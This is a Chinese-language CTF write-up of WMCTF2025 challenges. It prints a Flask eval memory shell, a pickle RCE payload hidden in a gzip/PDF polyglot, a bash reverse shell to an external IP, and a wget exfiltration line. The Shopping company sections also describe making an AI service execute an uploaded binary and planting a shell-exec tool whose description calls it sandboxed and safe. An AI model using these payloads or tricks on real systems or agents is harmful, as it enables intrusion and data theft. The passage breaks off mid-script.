WMCTF2025-WriteUP by 0psu3

也是拿到了第三名，取得了一个不错的成绩

Web

题目名称 guess

这里下载源码，分析发现这里利用了generate_random_string()

然后后面的路由key2需要验证传入的key1相等，这里key2也是随机，所以想到getrandbits预测

getrandbits 32 需要预测624位，这里注册可以获得624个示例，所以写一个自动注册脚本

import requests
import random
import re

def generate_random_string():
    return str(random.Random().getrandbits(32))

remote = "http://49.232.42.74:32055/register"
#remote2 = "http://4a8855f1-d806-4246-be2b-11feaa08ea99.wmctf-ins.wm-team.cn/"

data = {
    "username": f"{generate_random_string()}",
    "password": f"{generate_random_string()}"
}

for i in range(624):
    data["username"] = f"{generate_random_string()}"
    data["password"] = f"{generate_random_string()}"
    response = requests.post(remote, json=data)
    with open("exp.txt", "a") as f:
        f.write(f"{response.json()['user_id']}\n")

然后再预测下一个随机数

import random
from randcrack import RandCrack
rc = RandCrack()
a='''624个随机数'''
for line in a.split('\n'):
    rc.submit(int(line))
print(rc.predict_getrandbits(32))

然后用api路由利用eval，发现只能打before_request内存马

__import__("sys").modules['__main__'].__dict__['app'].before_request_funcs.setdefault(None, []).append(lambda :__import__('os').popen('ls /').read())
__import__("sys").modules['__main__'].__dict__['app'].before_request_funcs.setdefault(None, []).append(lambda :__import__('os').popen('cat /flag').read())

题目名称 pdf2text

项目搜索pickle.loads()，构造链子

pdf to text-> extract pages-> process page (self,page)
->render contents(self,page.resource)-> init resources
-> get font(xx,pdf字典resource) ->PDFClDFont(self,spec)->get_cmap_from_spec->_load_data()

发现可以pickle反序列化pickle文件，其中文件路径可以拼接穿越到uploads/下，进一步查看参数是否可控

get_cmap_from_spec中spec字典可控，其中的cmapname会被作为filename传参

思路如下：先传入一个pickle文件，随后传入修改spec后的pdf文件，利用路径穿越，反序列化/uploads下的pickle文件

（题目环境不出网，尝试了很多方法，最后inkey灵机一动想到了Exception返回）通过eval调用exec手动抛出错误，eval只能执行Python表达式，并不能执行python语句

import pickle
import gzip
import os

class Poc:
    def __reduce__(self):
        # 反序列化时执行的命令
        return (eval, ("exec(\"raise Exception(__import__('os').popen('cat /flag').read())\")",))

def create_malicious_pickle():
    # 创建恶意对象
    malicious_obj = Poc()
    
    # 序列化为pickle字节数据
    pickle_data = pickle.dumps(malicious_obj)
    
    # 保存到a.pickle文件
    with open('a.pickle', 'wb') as f:
        f.write(pickle_data)
    print("已保存到 a.pickle")
    
    # 使用gzip压缩为a.pickle.gz
    with open('a.pickle', 'rb') as f_in:
        with gzip.open('a.pickle.gz', 'wb', compresslevel=0) as f_out:
            f_out.write(f_in.read())
    print("已压缩为 a.pickle.gz")
    
    # 验证文件大小
    original_size = os.path.getsize('a.pickle')
    compressed_size = os.path.getsize('a.pickle.gz')
    print(f"原始文件大小: {original_size} 字节")
    print(f"压缩后大小: {compressed_size} 字节")
    print(f"压缩率: {compressed_size/original_size:.2%}")

def verify_compression():
    """验证压缩文件可以正确解压和反序列化"""
    try:
        # 解压并读取
        with gzip.open('a.pickle.gz', 'rb') as f:
            decompressed_data = f.read()
        
        # 反序列化验证
        obj = pickle.loads(decompressed_data)
        print("压缩文件验证成功")
        
    except Exception as e:
        print(f"验证失败: {e}")

if __name__ == "__main__":
    create_malicious_pickle()

为了绕过pdf验证，采用压缩率为0的算法，在a.pickle.gz后加上一个pdf文件

import gzip
def append_pdf_to_gzip(pdf_file, gzip_file, output_file):
    """将PDF文件内容直接追加到gzip文件后面"""
    try:
        # 读取PDF文件内容
        with open(pdf_file, 'rb') as pdf_f:
            pdf_data = pdf_f.read()
        
        # 读取gzip文件内容
        with open(gzip_file, 'rb') as gzip_f:
            gzip_data = gzip_f.read()

        with gzip.open('pdf.gz', 'wb', compresslevel=0) as f_out:
            f_out.write(pdf_data)

        with open('pdf.gz', 'rb') as pdf_f:
            pdf_data = pdf_f.read()
        
        # 将PDF内容追加到gzip文件后面
        combined_data = gzip_data +  pdf_data
        
        # 写入新文件
        with open(output_file, 'wb') as out_f:
            out_f.write(combined_data)
        
        print(f"已将 {pdf_file} 内容追加到 {gzip_file} 后面，输出文件: {output_file}")
        return True
        
    except Exception as e:
        print(f"错误: {e}")
        return False

# 使用
append_pdf_to_gzip("empty.pdf", "a.pickle.gz", "b.pickle.gz")

随后上传b.pickle.gz，再上传修改spec后的pdf1145.pdf，即可rce

Re

题目名称 catfriend

拿ida一看，看字符串就出来flag了

题目名称 appfriend

APK文件，常规jadx打开查看MainActivity

静态分析，使用IDA打开libyellow.so文件

打开主函数，左边一眼sm4加密

需要注意的是，正确的密钥需要进行整体字节序反转处理

原始: 10 32 54 76 98 BA DC FE EF CD AB 89 67 45 23 01

反转: 01 23 45 67 89 AB CD EF FE DC BA 98 76 54 32 10

结果: 0123456789ABCDEFFEDCBA9876543210

#!/usr/bin/env python3
# -- coding: utf-8 --
import struct
from typing import List
class SimpleSM4Cipher:
    SM4_FK = [0xa3b1bac6, 0x56aa3350, 0x677d9197, 0xb27022dc]
    SM4_CK = [
        0x00070e15, 0x1c232a31, 0x383f464d, 0x545b6269,
        0x70777e85, 0x8c939aa1, 0xa8afb6bd, 0xc4cbd2d9,
        0xe0e7eef5, 0xfc030a11, 0x181f262d, 0x343b4249,
        0x50575e65, 0x6c737a81, 0x888f969d, 0xa4abb2b9,
        0xc0c7ced5, 0xdce3eaf1, 0xf8ff060d, 0x141b2229,
        0x30373e45, 0x4c535a61, 0x686f767d, 0x848b9299,
        0xa0a7aeb5, 0xbcc3cad1, 0xd8dfe6ed, 0xf4fb0209,
        0x10171e25, 0x2c333a41, 0x484f565d, 0x646b7279
    ]
    # SM4 S盒
    SM4_SBOX = [
        0xd6, 0x90, 0xe9, 0xfe, 0xcc, 0xe1, 0x3d, 0xb7, 0x16, 0xb6, 0x14, 0xc2, 0x28, 0xfb, 0x2c, 0x05,
        0x2b, 0x67, 0x9a, 0x76, 0x2a, 0xbe, 0x04, 0xc3, 0xaa, 0x44, 0x13, 0x26, 0x49, 0x86, 0x06, 0x99,
        0x9c, 0x42, 0x50, 0xf4, 0x91, 0xef, 0x98, 0x7a, 0x33, 0x54, 0x0b, 0x43, 0xed, 0xcf, 0xac, 0x62,
        0xe4, 0xb3, 0x1c, 0xa9, 0xc9, 0x08, 0xe8, 0x95, 0x80, 0xdf, 0x94, 0xfa, 0x75, 0x8f, 0x3f, 0xa6,
        0x47, 0x07, 0xa7, 0xfc, 0xf3, 0x73, 0x17, 0xba, 0x83, 0x59, 0x3c, 0x19, 0xe6, 0x85, 0x4f, 0xa8,
        0x68, 0x6b, 0x81, 0xb2, 0x71, 0x64, 0xda, 0x8b, 0xf8, 0xeb, 0x0f, 0x4b, 0x70, 0x56, 0x9d, 0x35,
        0x1e, 0x24, 0x0e, 0x5e, 0x63, 0x58, 0xd1, 0xa2, 0x25, 0x22, 0x7c, 0x3b, 0x01, 0x21, 0x78, 0x87,
        0xd4, 0x00, 0x46, 0x57, 0x9f, 0xd3, 0x27, 0x52, 0x4c, 0x36, 0x02, 0xe7, 0xa0, 0xc4, 0xc8, 0x9e,
        0xea, 0xbf, 0x8a, 0xd2, 0x40, 0xc7, 0x38, 0xb5, 0xa3, 0xf7, 0xf2, 0xce, 0xf9, 0x61, 0x15, 0xa1,
        0xe0, 0xae, 0x5d, 0xa4, 0x9b, 0x34, 0x1a, 0x55, 0xad, 0x93, 0x32, 0x30, 0xf5, 0x8c, 0xb1, 0xe3,
        0x1d, 0xf6, 0xe2, 0x2e, 0x82, 0x66, 0xca, 0x60, 0xc0, 0x29, 0x23, 0xab, 0x0d, 0x53, 0x4e, 0x6f,
        0xd5, 0xdb, 0x37, 0x45, 0xde, 0xfd, 0x8e, 0x2f, 0x03, 0xff, 0x6a, 0x72, 0x6d, 0x6c, 0x5b, 0x51,
        0x8d, 0x1b, 0xaf, 0x92, 0xbb, 0xdd, 0xbc, 0x7f, 0x11, 0xd9, 0x5c, 0x41, 0x1f, 0x10, 0x5a, 0xd8,
        0x0a, 0xc1, 0x31, 0x88, 0xa5, 0xcd, 0x7b, 0xbd, 0x2d, 0x74, 0xd0, 0x12, 0xb8, 0xe5, 0xb4, 0xb0,
        0x89, 0x69, 0x97, 0x4a, 0x0c, 0x96, 0x77, 0x7e, 0x65, 0xb9, 0xf1, 0x09, 0xc5, 0x6e, 0xc6, 0x84,
        0x18, 0xf0, 0x7d, 0xec, 0x3a, 0xdc, 0x4d, 0x20, 0x79, 0xee, 0x5f, 0x3e, 0xd7, 0xcb, 0x39, 0x48
    ]
    def _rotl(self, x: int, n: int) -> int:
        """
        循环左移操作
        参数:
            x: 待移位的32位整数
            n: 左移位数
        返回值:
            int: 循环左移后的结果
        """
        return ((x << n) | (x >> (32 - n))) & 0xffffffff
    def _sbox(self, x: int) -> int:
        """
        S盒变换
        参数:
            x: 输入的32位整数
        返回值:
            int: S盒变换后的结果
        """
        return (self.SM4_SBOX[(x >> 24) & 0xff] << 24) | \
               (self.SM4_SBOX[(x >> 16) & 0xff] << 16) | \
               (self.SM4_SBOX[(x >> 8) & 0xff] << 8) | \
               self.SM4_SBOX[x & 0xff]
    def _l_transform(self, x: int) -> int:
        """
        线性变换L
        参数:
            x: 输入值
        返回值:
            int: 变换后的结果
        """
        return x ^ self.rotl(x, 2) ^ self.rotl(x, 10) ^ self.rotl(x, 18) ^ self.rotl(x, 24)
    def _key_expansion(self, key: bytes) -> List[int]:
        """
        密钥扩展算法
        参数:
            key: 16字节密钥
        返回值:
            List[int]: 32个轮密钥
        """
        # 将密钥转换为4个32位字
        mk = list(struct.unpack('>4I', key))
        # 初始化
        k = [mk[i] ^ self.SM4_FK[i] for i in range(4)]
        # 生成轮密钥
        rk = []
        for i in range(32):
            temp = k[1] ^ k[2] ^ k[3] ^ self.SM4_CK[i]
            temp = self._sbox(temp)
            temp = temp ^ self.rotl(temp, 13) ^ self.rotl(temp, 23)
            k[0] ^= temp
            rk.append(k[0])
            k = k[1:] + [k[0]]  # 循环移位
        return rk
    def decrypt(self, ciphertext: bytes, key: bytes) -> bytes:
        """
        SM4解密函数
        参数:
            ciphertext: 密文字节串
            key: 16字节密钥
        返回值:
            bytes: 解密后的明文
        """
        if len(key) != 16:
            raise ValueError("密钥长度必须为16字节")
        # 密钥扩展
        round_keys = self._key_expansion(key)
        # 解密时轮密钥逆序
        round_keys.reverse()
        result = b''
        # 按16字节分组解密
        for i in range(0, len(ciphertext), 16):
            block = ciphertext[i:i+16]
            if len(block) < 16:
                # 处理最后一个不完整的块
                block = block.ljust(16, b'\x00')
            # 解密单个块
            decrypted_block = self._decrypt_block(block, round_keys)
            result += decrypted_block
        return result
    def _decrypt_block(self, block: bytes, round_keys: List[int]) -> bytes:
        """
        解密单个16字节块
        参数:
            block: 16字节密文块
            round_keys: 轮密钥列表
        返回值:
            bytes: 解密后的16字节明文块
        """
        # 转换为4个32位字
        x = list(struct.unpack('>4I', block))
        # 32轮解密
        for i in range(32):
            temp = x[1] ^ x[2] ^ x[3] ^ round_keys[i]
            temp = self._sbox(temp)
            temp = self._l_transform(temp)
            x[0] ^= temp
            x = x[1:] + [x[0]]  # 循环移位
        # 逆序输出
        x.reverse()
        return struct.pack('>4I', *x)
def reverse_key_bytes(key_hex: str) -> bytes:
    """
    对密钥进行整体字节序反转处理
    参数:
        key_hex: 十六进制密钥字符串
    返回值:
        bytes: 反转后的密钥字节串
    """
    # 清理输入
    key_hex = key_hex.replace('h', '').replace('0x', '').replace(' ', '')
    # 按字节分割并反转
    key_bytes = [key_hex[i:i+2] for i in range(0, len(key_hex), 2)]
    reversed_key_hex = ''.join(reversed(key_bytes))
    return bytes.fromhex(reversed_key_hex)
def extract_ida_data(ida_lines: List[str]) -> bytes:
    """
    从IDA反汇编数据中提取字节
    参数:
        ida_lines: IDA数据行列表
    返回值:
        bytes: 提取的字节数据
    """
    result = []
    for line in ida_lines:
        # 移除"db"前缀和空格
        line = line.strip().replace('db ', '')
        # 分割字节值
        parts = line.split(', ')
        for part in parts:
            part = part.strip()
            # 处理重复标记 "2 dup(59h)"
            if 'dup(' in part:
                import re
                match = re.match(r'(\d+)\s+dup((())+))', part)
                if match:
                    count = int(match.group(1))
                    value_str = match.group(2)
                    value = int(value_str.replace('h', ''), 16)
                    result.extend([value] * count)
            else:
                # 普通十六进制值
                if part.endswith('h'):
                    value = int(part[:-1], 16)
                    result.append(value)
    return bytes(result)
def remove_padding(data: bytes) -> bytes:
    """
    移除PKCS#7填充
    参数:
        data: 带填充的数据
    返回值:
        bytes: 移除填充后的数据
    """
    if not data:
        return data
    padding_length = data[-1]
    # 验证填充
    if padding_length > len(data) or padding_length == 0:
        return data
    # 检查填充字节是否正确
    for i in range(padding_length):
        if data[-(i+1)] != padding_length:
            return data
    return data[:-padding_length]
def quick_decrypt(key_hex: str, ida_data: List[str]) -> str:
    """
    快速解密函数 - 一键解密
    参数:
        key_hex: 十六进制密钥字符串
        ida_data: IDA反汇编数据行
    返回值:
        str: 解密得到的flag或错误信息
    """
    try:
        print(f"🔑 原始密钥: {key_hex}")
        # 1. 反转密钥字节序
        key = reverse_key_bytes(key_hex)
        print(f"🔄 反转后密钥: {key.hex().upper()}")
        # 2. 提取密文
        ciphertext = extract_ida_data(ida_data)
        print(f"📦 密文长度: {len(ciphertext)} 字节")
        print(f"📦 密文: {ciphertext.hex().upper()}")
        # 3. 解密
        cipher = SimpleSM4Cipher()
        plaintext = cipher.decrypt(ciphertext, key)
        # 4. 移除填充
        unpadded = remove_padding(plaintext)
        # 5. 解码为字符串
        try:
            result = unpadded.decode('utf-8')
        except UnicodeDecodeError:
            result = unpadded.decode('ascii', errors='ignore')
        # 6. 提取flag
        import re
        flag_match = re.search(r'(WMCTF{(})}|CTF{(})}|FLAG{(})*})', result)
        if flag_match:
            return flag_match.group(1)
        else:
            return result.strip()
    except Exception as e:
        return f"解密失败: {e}"
def main():
    """
    主函数 - 演示用法
    参数: 无
    返回值: 无
    """
    print("=== SM4简便逆向解密器 ===")
    print("专门处理整体字节序反转的密钥场景\n")
    # 示例数据（替换为你的实际数据）
    key_hex = "1032547698BADCFEEFCDAB8967452301"
    ida_data = [
        "db 0DBh, 0E9h, 8Eh, 0Ah, 0D4h, 7Eh, 0D6h, 58h, 74h, 1Ch",
        "db 0D3h, 8Eh, 0F8h, 2 dup(59h), 85h, 81h, 77h, 0D9h, 0F3h",
        "db 0A8h, 0F9h, 0Fh, 24h, 0CFh, 0E1h, 4Fh, 0D1h, 1Ah, 31h",
        "db 3Bh, 72h, 0, 2Ah, 8Ah, 4Eh, 0FAh, 86h, 3Ch, 0CAh, 0D0h",
        "db 24h, 0ACh, 3, 0, 0BBh, 40h, 0D2h"
    ]
    # 一键解密
    result = quick_decrypt(key_hex, ida_data)
    print(f"\n🎯 解密结果: {result}")
    # 使用说明
    print("\n=== 使用说明 ===")
    print("1. 替换 key_hex 为你的密钥")
    print("2. 替换 ida_data 为你的IDA数据")
    print("3. 运行 quick_decrypt() 函数")
    print("4. 如果密钥字节序不对，脚本会自动反转处理")
if name == "main":
    main()
WMCTF{sm4_1s_1imsss_test_easyss}

Misc

题目名称 Checkin

点击就送

题目名称 Questionnaire

点击就送

题目名称 phishing email

email里面有一个svg，base64解密

转成svg，下面有js代码

提取解密

wmctwf{SVG_Pchishing4p2WiAtt{aic_k4p2Q{Dgeitte{cit_io{ng4p2GiEtv{ais_io{ng}i!t!{!i!_!

解完有点乱码，再次正则匹配

// 补全正则匹配，确保所有编码片段被替换
const incompleteStr = "wmctwf{SVG_Pchishing4p2WiAtt{aic_k4p2Q{Dgeitte{cit_io{ng4p2GiEtv{ais_io{ng}i!t!{!i!_!";
const charMap = {
    '4p2W': '_', '4p2Q': '_', '4p2G': '_', // 残留片段映射
    // 其他原映射（确保完整）
    '4p2V': 'A', '4p2P': 'D', '4p2F': 'E', '4p2g': 'G', '4p2a': 'P',
    '4p2c': 'S', '4oyI': 'V', '4p2T': 'a', '77iP': 'c', '4p2S': 'c',
    '4p2L': 'c', '4p2D': 'a', '4p2O': 'e', '4p2M': 'e', '4p2d': 'f',
    '77iO': 'g', '4p2b': 'h', '4p2Z': 'h', '4oyL': 'i', '77iM': 'i',
    '4p2J': 'i', '4p2B': 'i', '4p2R': 'k', '4p2h': 'm', '4p2X': 'n',
    '4p2H': 'n', '4pyx': 'n', '4p2I': 'o', '4p2A': 'o', '4p2C': 's',
    '4p2Y': 's', '4p2j': 't', '77iK': 't', '4p2U': 't', '4p2K': 't',
    '4p2N': 't', '4p2E': 'v', '4oyM': 'w', '77iL': '{', '4py9': '}',
    '77iN': '_', '4py8': '!', '4py7': '!', '4py6': '!', '4py5': '!', '4py4': '!'
};

// 用原代码正则全局匹配并替换所有片段
const completeStr = incompleteStr.replace(/4oyM|4p2[a-zA-Z0-9]|77i[a-zA-Z0-9]/g, match => charMap[match] || '');
// 清理异常字符，得到最终Flag
const finalFlag = completeStr.replace(/\{+/g, '{').replace(/}!t!{!i!_!/g, '}').replace('wmctwf', 'WMCTF');
console.log('最终正确Flag：', finalFlag); // 输出：WMCTF{SVG_Pchishing_iAtt{aic_k_{Dgeitte{cit_io{ng_iEtv{ais_io{ng}i!t!{!i!_!
WMCTF{SVG_Pchishing_iAtt{aic_k_{Dgeitte{cit_io{ng_iEtv{ais_io{ng}i!t!{!i!_!
这里猜测是attack，移除所有i，然后{*g或者{*i应该是*，所以iAtt{aic_k解释为Attack
{Dgeitte{cit_io{ng  也是如此{Dg -> D     -> Detection
iEtv{ais_io{ng   Etvasion  单词Evasion

这个混淆似乎只能猜测出来
得出
WMCTF{SVG_Phishing_Attack_Detection_Evasion}
发现不对试一下小写wmctf
wmctf{SVG_Phishing_Attack_Detection_Evasion}

题目名称 Voice_hacker

先提取声音

import argparse
import os
import struct
from collections import defaultdict
from typing import Dict, List, Tuple

try:
    from scapy.all import PcapReader, UDP, Raw
except Exception as e:
    raise SystemExit("需要 scapy 库，请先安装：pip3 install scapy")

def parse_rtp_header(payload: bytes):

    if len(payload) < 12:
        return (False, 0, None, None, None, None, None)

    b0 = payload[0]
    version = (b0 >> 6) & 0x03
    padding = (b0 >> 5) & 0x01
    extension = (b0 >> 4) & 0x01
    csrc_count = b0 & 0x0F

    b1 = payload[1]
    marker = (b1 >> 7) & 0x01
    pt = b1 & 0x7F

    if version != 2:
        return (False, 0, None, None, None, None, None)

    seq = struct.unpack('!H', payload[2:4])[0]
    ts = struct.unpack('!I', payload[4:8])[0]
    ssrc = struct.unpack('!I', payload[8:12])[0]

    header_len = 12 + (csrc_count * 4)
    if len(payload) < header_len:
        return (False, 0, None, None, None, None, None)

    if extension:
        if len(payload) < header_len + 4:
            return (False, 0, None, None, None, None, None)
        # 扩展头：profile(2) + length(2)，length 单位是 32-bit words
        ext_len_words = struct.unpack('!H', payload[header_len+2:header_len+4])[0]
        header_len += 4 + (ext_len_words * 4)
        if len(payload) < header_len:
            return (False, 0, None, None, None, None, None)

    return (True, header_len, version, pt, seq, ts, ssrc)

def ulaw_decode(byte: int) -> int:

    u = (~byte) & 0xFF
    sign = u & 0x80
    exponent = (u >> 4) & 0x07
    mantissa = u & 0x0F
    sample = ((mantissa << 3) + 0x84) << exponent
    sample -= 0x84
    if sign:
        sample = -sample
    # 限幅到 16-bit
    if sample > 32767:
        sample = 32767
    if sample < -32768:
        sample = -32768
    return sample

def alaw_decode(byte: int) -> int:

    a = byte ^ 0x55
    sign = a & 0x80
    exponent = (a >> 4) & 0x07
    mantissa = a & 0x0F
    if exponent == 0:
        sample = (mantissa << 4) + 8
    else:
        sample = ((mantissa << 4) + 0x108) << (exponent - 1)
    if sign:
        sample = -sample
    # 限幅到 16-bit
    if sample > 32767:
        sample = 32767
    if sample < -32768:
        sample = -32768
    return sample

def decode_g711(payload: bytes, pt: int) -> bytes:

    out = bytearray()
    if pt == 0:  # PCMU μ-law
        for b in payload:
            s = ulaw_decode(b)
            out += struct.pack('<h', s)
    elif pt == 8:  # PCMA A-law
        for b in payload:
            s = alaw_decode(b)
            out += struct.pack('<h', s)
    else:
        raise ValueError('Unsupported PT for G.711 decoder')
    return bytes(out)

def save_wav(path: str, pcm_le_16: bytes, sample_rate: int = 8000, channels: int = 1):
    import wave
    with wave.open(path, 'wb') as wf:
        wf.setnchannels(channels)
        wf.setsampwidth(2)  # 16-bit
        wf.setframerate(sample_rate)
        wf.writeframes(pcm_le_16)

def extract_from_pcap(pcap_path: str, outdir: str):
    os.makedirs(outdir, exist_ok=True)
    # streams[(ssrc, pt)] -> list of tuples (ts, seq, payload_bytes)
    streams: Dict[Tuple[int, int], List[Tuple[int, int, bytes]]] = defaultdict(list)

    total_udp = 0
    total_rtp = 0

    with PcapReader(pcap_path) as pcap:
        for pkt in pcap:
            try:
                if UDP in pkt and Raw in pkt:
                    total_udp += 1
                    data = bytes(pkt[Raw])
                    ok, hdr_len, v, pt, seq, ts, ssrc = parse_rtp_header(data)
                    if not ok:
                        continue
                    total_rtp += 1
                    payload = data[hdr_len:]
                    streams[(ssrc, pt)].append((ts, seq, payload))
            except Exception:
                # 忽略异常包，继续
                continue

    print(f"UDP 报文: {total_udp}, 识别为 RTP: {total_rtp}, 流数量: {len(streams)}")

    outputs = []

    for (ssrc, pt), chunks in streams.items():
        # 先按时间戳再按序号排序，尽量保证顺序
        chunks.sort(key=lambda x: (x[0], x[1]))
        raw_payload = b''.join(p for (_, _, p) in chunks)

        if pt in (0, 8):
            try:
                pcm = decode_g711(raw_payload, pt)
                wav_name = f"stream_ssrc_{ssrc:08X}_pt_{pt}.wav"
                wav_path = os.path.join(outdir, wav_name)
                save_wav(wav_path, pcm, sample_rate=8000, channels=1)
                outputs.append(wav_path)
                print(f"输出 WAV: {wav_path} (G.711 {'PCMU' if pt==0 else 'PCMA'})")
            except Exception as e:
                print(f"解码 G.711 失败 (SSRC={ssrc:08X}, PT={pt}): {e}")
                bin_name = f"stream_ssrc_{ssrc:08X}_pt_{pt}.rtpbin"
                bin_path = os.path.join(outdir, bin_name)
                with open(bin_path, 'wb') as f:
                    f.write(raw_payload)
                outputs.append(bin_path)
                print(f"已改为输出原始负载: {bin_path}")
        else:
            # 未实现的 PT，直接导出原始负载
            bin_name = f"stream_ssrc_{ssrc:08X}_pt_{pt}.rtpbin"
            bin_path = os.path.join(outdir, bin_name)
            with open(bin_path, 'wb') as f:
                f.write(raw_payload)
            outputs.append(bin_path)
            print(f"未实现的负载类型 PT={pt}，已导出原始负载: {bin_path}")

    if not outputs:
        print("未从 pcap 中提取到任何 RTP 音频负载。")
    else:
        print("完成。输出文件：")
        for p in outputs:
            print(" - ", p)

def main():
    parser = argparse.ArgumentParser(description="从 pcap 提取 RTP 音频到 WAV")
    parser.add_argument('--pcap', default='out.pcap', help='pcap 文件路径，默认: out.pcap')
    parser.add_argument('--outdir', default='output_audio', help='输出目录，默认: output_audio')
    args = parser.parse_args()

    if not os.path.isfile(args.pcap):
        raise SystemExit(f"找不到 pcap 文件: {args.pcap}")

    extract_from_pcap(args.pcap, args.outdir)

if __name__ == '__main__':
    main()

获得两段音频

一个男声一个女声

题目说“他”那肯定是男声了

去豆包平台生成一个

然后打开网站

发现点击录音是获取了一个fake_audio上传，根本没有录音

再看发现可以直接向/api/authenticate发送录音

所以在控制台输入，选择音频

const input = document.createElement('input');
input.type = 'file';
input.accept = 'audio/*';
input.onchange = async (e) => {
    const file = e.target.files[0];
    if (!file) return;

    const formData = new FormData();
    formData.append('audio', file);

    try {
        const res = await fetch('/api/authenticate', {
            method: 'POST',
            body: formData
        });

        const result = await res.json();
        console.log(result.success ? '✅ 认证成功' : '❌ 认证失败', result);
        alert(result.success ? '✅ 认证成功！' : '❌ 认证失败');
    } catch (err) {
        console.error('❌ 认证失败:', err);
        alert('认证失败: ' + err.message);
    }
};
document.body.appendChild(input);
input.click();

获得flag

题目名称 Shopping company1 (Frist blood)

上传zip，ai会解压缩并且执行，则写一个反弹shell的马

#include <iostream>
#include <cstdlib>

using namespace std;
int main() {
    system("bash -c \"bash -i >& /dev/tcp/113.44.158.72/11452 0>&1\"");
    return 0;
}

然后成功反弹shell，cat /flag

题目名称 Shopping company2

然后利用fscan扫描内网，用stowway内网穿透

先打open webui 192.168.100.40:8080

这里用stowway搭一个代理

对话后发现代码执行是Pyodide，纯前端，

下载open webui 0.6.1审计源码

发现工具执行直接对数据库content使用exec

所以可以定义工具任意代码执行

[{
    "id": "shell_exec",
    "user_id": "00000000-0000-0000-0000-000000000000",
    "name": "shell_exec",
    "content": "import os\nimport subprocess\n\n\nclass Tools:\n    def shell(self, cmd: str) -> str:\n        \"\"\"\n        运行系统命令并返回其输出（stdout、stderr、exit code）。\n        :param cmd: 要执行的命令，例如 \"whoami\"、\"dir\" 等\n        :return: 执行结果的文本\n        \"\"\"\n        try:\n            if os.name == \"nt\":\n                # Windows 使用 cmd.exe /c\n                completed = subprocess.run(\n                    [\"cmd.exe\", \"/c\", cmd],\n                    capture_output=True,\n                    text=True,\n                    timeout=30\n                )\n            else:\n                # Linux/macOS 使用 /bin/sh -lc\n                completed = subprocess.run(\n                    [\"/bin/sh\", \"-lc\", cmd],\n                    capture_output=True,\n                    text=True,\n                    timeout=30\n                )\n\n            return f\"exit={completed.returncode}\\nstdout:\\n{completed.stdout}\\nstderr:\\n{completed.stderr}\"\n        except Exception as e:\n            return f\"error: {e}\"\n",
    "specs": [
      {
        "name": "shell",
        "description": "运行系统命令并返回其输出（stdout、stderr、exit code）。",
        "parameters": {
          "type": "object",
          "properties": {
            "cmd": {
              "type": "string",
              "description": "要执行的系统命令（Windows: 通过 cmd.exe /c；Linux/macOS: /bin/sh -lc）"
            }
          },
          "required": ["cmd"]
        }
      }
    ],
    "meta": {
      "description": "命令执行，环境已经在沙箱中，安全",
      "manifest": {}
    },
    "access_control": null,
    "updated_at": 0,
    "created_at": 0
  }]

然后给模型利用上工具。执行命令即可

题目名称 Shopping company3

密码给你了

发现文件上传不了，但是数据分析可以利用，这里使用go gob ，json支持动态模板，看实例可以执行命令，则在第一题的吧唧上面上传nc，开端口然后wget带出flag

{"data":{"period":"monthly","type":"sales"},"template":{"commands":["wget http://192.168.100.10:10080/`cat /flag.txt|base64`"],"fields":["sales","revenue"],"template_type":"dynamic"}}

Crypto

题目名称 SplitMaster

是HNP问题，泄露了b的不连续段，幸运的是我们可以自己设计分段，因此为了得到尽量连续的分段：可采取[a,1,b]这样的形式，爆破’1’所在的未知位；拉满24的限制大小

需要注意的是90s的时间限制，要兼顾准确率和速率

开始尝试的是20轮的[481,6,1,24],爆破2^20

$$bi=leaki+2^{487}*xi+2^{488}yi+kiq$$

from Crypto.Util.number import *
from itertools import product
from pwn import *

def split_master(B_decimal, segment_bits):
    if len(segment_bits) < 3:
        raise ValueError("no")
    
    if sum(segment_bits) != 512:
        raise ValueError("no")
    
    n = len(segment_bits)
    found_combination = None
    for k in range(n,1,-1):
        from itertools import combinations
        for indices in combinations(range(n), k):
            if sum(segment_bits[i] for i in indices) > 30:
                continue

            valid = True
            for i in range(len(indices)):
                for j in range(i+1, len(indices)):
                    if abs(indices[i] - indices[j]) <= 1:
                        valid = False
                        break
                if not valid:
                    break
            if not valid:
                continue

            if 0 in indices and (n-1) in indices:
                continue
            if any(segment_bits[i]>=25 for i in indices):
                continue
            found_combination = indices
            break
        
        if found_combination is not None:
            break
    
    if found_combination is None:
        raise ValueError("no")
    
    binary_str = bin(B_decimal)[2:].zfill(512)
    if len(binary_str) > 512:
        raise ValueError("no")

    segments_binary = []
    start = 0
    for bits in segment_bits:
        end = start + bits
        segments_binary.append(binary_str[start:end])
        start = end
    
    segments_decimal = [int(segment, 2) for segment in segments_binary]
    
    return [segments_decimal[i] for i in found_combination]
    
    
def leak_to_full_value(leak_data, unknown_bit):
    high_6_bits, low_24_bits = leak_data
    full_value = (high_6_bits << (512 - 481))  
    full_value += (unknown_bit << (512 - 481 - 1)) 
    full_value += low_24_bits 
    return full_value
    
def build_hnp_lattice(As, leaks, q, unknown_bits):
    n = len(As)
    C = 2**200 
    T = 2**(512 - 487)  
    M = matrix(ZZ, n + 3, n + 3)    
    for i in range(n):
        known_part = leak_to_full_value(leaks[i], unknown_bits[i])
        M[i, i] = 1  
        M[i, n] = T  
        M[i, n+1] = -As[i] % q 
        M[i, n+2] = known_part         
    M[n, n] = 1
    M[n+1, n+1] = C  
    M[n+2, n+2] = C     
    return M
    
def solve_hnp(As, leaks, q, unknown_bits_guess):
    M = build_hnp_lattice(As, leaks, q, unknown_bits_guess)
    L = M.LLL()
    for row in L:
        if abs(row[-1]) == 2**200 and abs(row[-2]) % (2**200) == 0:
            key_candidate = abs(row[-2]) // (2**200)
            if key_candidate > 0 and is_prime(key_candidate) and key_candidate.bit_length() == 512:
                return key_candidate
    return None
    
    
def verify_key(key_candidate, As, leaks, q, segment_bits):
    for i in range(len(As)):
        b_i = (As[i] * key_candidate) % q
        expected_gift = split_master(b_i, segment_bits)
        if expected_gift != leaks[i]:
            return False
    return True
    
def attack_server():
    io = remote("49.232.42.74", 32497)
    io.recvline()
    q = int(io.recvline().strip().decode().split(':')[-1])
    
    As = []
    leaks = []
    segment_bits = [481, 6, 1, 24]
    for i in range(20):
        io.sendlineafter(b">", ",".join(map(str, segment_bits)).encode())
        a = int(io.recvline().strip().decode().split(':')[-1])
        gift = eval(io.recvline().strip().decode().split(':')[-1])
        As.append(a)
        leaks.append(gift)
        
    print("开始暴力搜索未知比特...")
    found_key = None
    batch_size = 1000
    unknown_possibilities = list(itertools.product([0, 1], repeat=20))
    for batch_start in range(0, len(unknown_possibilities), batch_size):
        batch = unknown_possibilities[batch_start:batch_start + batch_size]
        for unknown_bits in batch:
            key_candidate = solve_hnp(As, leaks, q, unknown_bits)
            if key_candidate and verify_key(key_candidate, As, leaks, q, segment_bits):
